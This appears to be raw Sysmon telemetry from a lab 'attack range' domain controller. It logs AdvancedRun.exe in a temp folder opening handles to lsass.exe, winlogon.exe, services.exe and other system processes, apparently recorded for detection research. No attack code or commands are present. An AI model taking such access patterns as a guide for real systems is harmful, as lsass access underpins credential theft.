10341000x80000000000000004079714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
734700x80000000000000004079703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004079702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.523{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
